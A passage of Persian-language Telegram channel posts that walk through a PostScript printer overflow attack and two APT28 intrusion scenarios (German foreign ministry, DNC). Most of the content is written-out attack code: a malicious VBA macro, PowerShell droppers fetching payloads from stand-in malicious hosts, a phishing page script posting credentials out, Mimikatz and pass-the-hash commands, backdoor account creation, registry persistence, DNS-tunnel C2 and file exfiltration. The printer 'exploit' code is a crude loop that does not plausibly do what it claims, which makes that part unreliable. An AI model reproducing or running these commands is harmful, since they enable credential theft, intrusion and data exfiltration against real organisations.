% ایجاد یه حلقه بی‌پایان برای افزایش بار پردازش
userdict begin
100 dict begin
/Buffer 1024 string def
0 1 20000 {
    Buffer (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) putinterval
} for
end
end

این کد بافر استک رو بیش از حد پر می‌کنه و باعث کرش یا اجرای کد دلخواه می‌شه.

🔹 گام 3: ارسال فایل مخرب به پرینتر
مهاجم می‌تونه فایل رو با یکی از روش‌های زیر به پرینتر ارسال کنه:
از طریق Netcat:

nc <target-IP> 9100 < exploit.ps

از طریق LPD (Line Printer Daemon):

lpr -H <target-IP> -P raw -o raw exploit.ps

یا اگه پرینتر به شبکه‌ای با ایمیل متصل باشه، مهاجم می‌تونه فایل رو تو قالب یه پیوست برای پرینتر ارسال کنه.

🔹 گام 4: اجرای کد بصورت ریموت:
در صورت موفقیت، این حمله می‌تواند:
✅ اجرای دستورات دلخواه تو سطح فریمور پرینتر
✅ دریافت Shell Access برای اجرای دستورات بیشتر
✅ ایجاد یه بکدور تو دستگاه برای حملات آینده

⬅️ پتانسیل استفاده تو حملات پیشرفته (Advanced Exploitation)
اگه مهاجم کنترل یه پرینتر متصل به شبکه داخلی سازمان رو به دست بگیره، می‌تونه:
یک. MITM Attack: ترافیک اسناد چاپی رو رهگیری و تغییر بده.
دو. Pivot Attack: از پرینتر به عنوان نقطه محوری برای نفوذ بیشتر به شبکه استفاده کنه.
سه. Backdoor Installation: از پرینتر برای ایجاد یک نقطه دسترسی دائمی به شبکه سازمان بهره ببره.

⬅️ راه‌کارهای امنیتی (Mitigation)
✅ آپدیت فریمور پرینتر
✅ محدود کردن دسترسی به پورت‌های 9100، 515 و 631 از طریق فایروال
✅ غیرفعال کردن پردازش PostScript تو تنظیمات پرینتر (اگه امکان‌پذیر باشه)
✅ مانیتورینگ لاگ‌های پرینتر برای شناسایی فعالیت‌های غیرعادی
✅ محدود کردن دسترسی پرینتر به کاربرای احراز هویت‌شده

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ سه سناریو واقعی از نفوذهای گروه APT28

🔹 سناریو یک: نفوذ به شبکه‌ وزارت امور خارجه آلمان با هدف جاسوسی از ارتباطات دولتی با بدافزار Seduploader

🔹 هدف:
✅نفوذ به سیستم‌های دیپلماتیک برای سرقت اطلاعات حساس
✅استقرار بدافزار برای مانیتورینگ و جمع‌آوری دیتاها
✅حرکت جانبی (Lateral Movement) برای گسترش حضور تو شبکه

🔹 گام 1: مهندسی اجتماعی و نفوذ اولیه
گروه APT28 از Spear Phishing برای نفوذ اولیه تو این سناریو استفاده کرده. یه ایمیل رسمی فیک به کارمندا ارسال شده که به نظر می‌رسیده از طرف یه سازمان بین‌المللی معتبر مثل EU External Action Service (EEAS) باشه.

فایل آلوده (Macro-Enabled Document)
ایمیل شامل یه فایل Word آلوده بوده که از ماکرو VBA مخرب استفاده می‌کرده. بعد از باز شدن فایل، ماکرو فعال می‌شده و PowerShell رو برای دانلود بدافزار اجرا می‌کرده:

Sub AutoOpen()
    Dim objShell As Object
    Set objShell = CreateObject("WScript.Shell")
    objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File C:\Users\Public\update.ps1"
End Sub

🔹 گام دو: دانلود و پیاده‌سازی بدافزار Seduploader
فایل update.ps1 که یه اسکریپت پاورشل رمزگذاری‌شده بوده؛ بدافزار اصلی رو دانلود می‌کرده:

$download = New-Object System.Net.WebClient
$url = "https://malicious-server.com/payload.exe"
$path = "$env:APPDATA\Microsoft\Windows\update.exe"
$download.DownloadFile($url, $path)
Start-Process -FilePath $path

ویژگی‌های بدافزار Seduploader
- بررسی سیستم: اطلاعات اولیه (مثل نسخه‌ ویندوز، یوزرنیم، پردازنده) رو جمع‌آوری می‌کنه.
- اجرای دستورات از راه دور (Remote Command Execution)
- ثبت کلیدهای زده‌شده (Keylogging)
- آپلود و دانلود فایل‌های مخرب
- استفاده از DNS Tunneling برای ارسال اطلاعات به سرور C2

ارتباط با سرور C2 با استفاده از DNS Tunneling
بدافزار Seduploader از ری‌کوئست‌های DNS برای ارسال اطلاعات به سرور C2 استفاده می‌کنه:

nslookup -type=TXT x7c9.malicious-domain.com

دیتاها به صورت Base64 یا XOR Encoding انکریپت شده‌ان.

🔹 گام سه: حرکت جانبی (Lateral Movement)
یک. Credential Dumping با استفاده از Mimikatz
بعد از استقرار اولیه، APT28 از ابزار Mimikatz برای سرقت هش‌های رمزعبور استفاده کرده:

privilege::debug
sekurlsa::logonpasswords

دو. Pass-the-Hash (PTH) برای دسترسی به سایر سیستم‌ها
اعضای APT28 با استفاده از هش‌ها به سیستم‌های دیگه متصل می‌شدن:

psexec \\target-system -u administrator -p NTLMHASH cmd.exe

سه. Pivoting با PowerShell Empire
با دسترسی به یه سیستم جدید، برای ایجاد ارتباط مستقیم، از PowerShell Empire استفاده می‌شده:

Invoke-PsExec -ComputerName target-system -Command "net user /add backdoor P@ssw0rd"

🔹 گام چهار: استخراج دیتاها (Exfiltration)
ارسال دیتاهای سرقت‌شده با پاورشل

$bytes = [System.IO.File]::ReadAllBytes("C:\sensitive_data.pdf")
Invoke-WebRequest -Uri "https://malicious-server.com/upload" -Method POST -Body $bytes

🔹 نتیجه:
اعضای گروه APT28 موفق به استخراج اطلاعات حساس دیپلماتیک شدن.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ سه سناریو واقعی از نفوذهای گروه APT28

🔹سناریو دو: حمله به کمیته ملی دموکرات (DNC) با فیشینگ و بدافزار X-Agent

🔹مقدمه:
گروه APT28 (Fancy Bear) تو سال 2016 حمله‌ای پیشرفته به کمیته ملی دموکرات (DNC) انجام داد که منجر به نشت اطلاعات حساس از ایمیل‌های مقامات عالی‌رتبه حزب دموکرات شد. این حمله یه عملیات پیچیده‌ جاسوسی سایبری بود که شامل مهندسی اجتماعی، اکسپلویت آسیب‌پذیری‌ها، نصب بدافزار، حرکت جانبی (lateral movement) و استخراج دیتاها بود. دیتاهای سرقت شده در نهایت توسط WikiLeaks منتشر شد که تأثیر زیادی روی انتخابات آمریکا گذاشت.

🔹مرحله 1: نفوذ اولیه از طریق فیشینگ هدفمند
گروه APT28 از حملات Spear Phishing برای Credential Harvesting کارمندای DNC استفاده کرده. ایمیل‌های فیکی که شبیه هشدارهای امنیتی گوگل بودن، برای مقامات ارسال شدن. هدف این بوده که اونا رو وادار به وارد کردن یوزرنیم و پسوردشون تو یه صفحه لاگین فیک کنن.

Subject: Unauthorized Access Detected – Change Your Password Immediately
From: Google Security Team <no-reply@security-google.com>

👈 ساخت صفحه لاگین جعلی
گروه APT28 صفحه‌ای که مشابه صفحه لاگین گوگل بوده رو طراحی کرده. این صفحه از طریق HTML و JavaScript اطلاعات لاگین تارگت رو سرقت می‌کرده. یه نمونه‌ از کد JavaScript تو صفحه لاگین فیک:

document.getElementById("login").onsubmit = function() {
    fetch("https://malicious-site.com/steal", {
        method: "POST",
        body: JSON.stringify({
            email: document.getElementById("email").value,
            password: document.getElementById("password").value
        })
    });
};

👈 استفاده از URL‌های کوتاه‌شده برای پنهان‌سازی لینک جعلی
گروه APT28 از سرویس‌های کوتاه‌کننده URL (مثل Bit.ly) برای مخفی کردن آدرس واقعی صفحه فیک استفاده کرده. مثال لینک مخرب:

https://bit.ly/secure-google-login

🔹مرحله 2: دسترسی به ایمیل‌ها و نصب بدافزار X-Agent
پس از دستیابی به پسوردها چه اتفاقی می‌افته؟
بعد از سرقت اعتبارنامه‌ها، اعضای گروه تونستن به حساب‌های ایمیل کارمندای DNC دسترسی پیدا کنن. اما این آخر کار نبود؛ برای کنترل گسترده‌تر، APT28 نیاز داشته که کنترل سیستم‌های داخلی DNC رو هم در اختیار بگیره. به همین خاطر اونا بدافزار X-Agent رو مستقر می‌کردن.
✅ استقرار X-Agent
👈 مراحل حمله پس از ورود به سیستم‌ها:
⬅️ 1- اعضای گروه از طریق VPN داخلی DNC یا پروتکل IMAP به ایمیل‌ها متصل می‌شدن.
⬅️ 2- بدافزار X-Agent رو روی سیستم‌های آلوده نصب می‌کردن.
👈 استقرار بدافزار از طریق PowerShell
بدافزار X-Agent با استفاده از PowerShell و رجیستری ویندوز به صورت مخفی اجرا می‌شده.
⬅️ یک. PowerShell Dropper برای دانلود و اجرای بدافزار:

$wc = New-Object System.Net.WebClient
$url = "https://malicious-server.com/xagent.exe"
$path = "$env:APPDATA\chrome_update.exe"
$wc.DownloadFile($url, $path)
Start-Process -FilePath $path -WindowStyle Hidden

⬅️ دو. Persistency تو ویندوز از طریق رجیستری:

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v chrome_update /t REG_SZ /d C:\Users\Public\chrome_update.exe

👈 ویژگی‌های بدافزار X-Agent
⬅️ یک. Keylogging – ثبت کلیدهای فشرده‌شده توسط کاربر
⬅️ دو. سرقت فایل‌ها – ارسال اسناد حساس به سرور C2
⬅️ سه. گرفتن اسکرین‌شات – تصویربرداری از دسکتاپ قربانی
⬅️ چهار. اجرای دستورات از راه دور (Remote Command Execution)
👈 مثال ارتباط X-Agent با سرور C2:

POST /command.php HTTP/1.1
Host: malicious-server.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 50

cmd=upload&file=/Users/Admin/Documents/confidential.pdf

🔹مرحله 3: حرکت جانبی (Lateral Movement) تو شبکه
چطور اعضای گروه تونستن کل شبکه DNC رو آلوده کنن؟
👈بعد از دسترسی به اولین سیستم، APT28 نیاز داشته به سیستم‌های دیگه هم نفوذ کنه. اونا این کار رو با استفاده از:
⬅️ یک. Credential Dumping با Mimikatz
⬅️ دو. Pass-the-Hash (PTH) برای ورود به سیستم‌های دیگه
⬅️سه. Pivoting برای دسترسی به منابع مهم
👈حرکت جانبی تو شبکه
⬅️ اجرای Mimikatz برای استخراج پسورد کارمندای DNC

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"

⬅️ اجرای Pass-the-Hash برای ورود به سایر سیستم‌ها

psexec \\target-system -u administrator -p NTLMHASH cmd.exe

اجرای Pivoting با PowerShell Empire

Invoke-PsExec -ComputerName target-system -Command "net user /add hacker P@ssw0rd"